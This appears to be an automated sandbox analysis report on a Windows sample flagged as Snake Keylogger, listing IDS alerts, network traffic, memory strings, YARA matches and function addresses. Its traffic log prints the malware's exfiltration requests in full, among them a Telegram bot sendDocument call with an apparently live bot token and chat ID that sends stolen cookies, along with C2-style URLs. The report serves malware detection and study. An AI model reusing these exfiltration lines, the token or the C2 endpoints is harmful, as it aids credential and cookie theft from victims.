                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49759 -> 104.21.112.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49802 -> 104.21.112.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49784 -> 104.21.112.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49792 -> 104.21.112.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49809 -> 104.21.112.1:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49753 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd329d9dfe367aHost: api.telegram.orgContent-Length: 1277
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 07:08:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49824 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.x8M2g1Xxhz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: x8M2g1Xxhz.exeStatic PE information: section name:
                      Source: x8M2g1Xxhz.exeStatic PE information: section name: .idata
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004028B00_2_004028B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A110C0_2_005A110C
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005749200_2_00574920
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005AE9AE0_2_005AE9AE
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004E89B90_2_004E89B9
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004182440_2_00418244
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A8A490_2_005A8A49
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005AB2870_2_005AB287
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00632B090_2_00632B09
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004193C40_2_004193C4
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00402B900_2_00402B90
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004073A00_2_004073A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043AC4F0_2_0043AC4F
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00408C600_2_00408C60
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0040DC110_2_0040DC11
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A4C2D0_2_005A4C2D
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00407C3F0_2_00407C3F
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005704D10_2_005704D1
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00418CCC0_2_00418CCC
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_00406CA00_2_00406CA0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0041A4BE0_2_0041A4BE
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0049BD430_2_0049BD43
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0057E5490_2_0057E549
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043BDCE0_2_0043BDCE
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_005A65E30_2_005A65E3
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_004016500_2_00401650
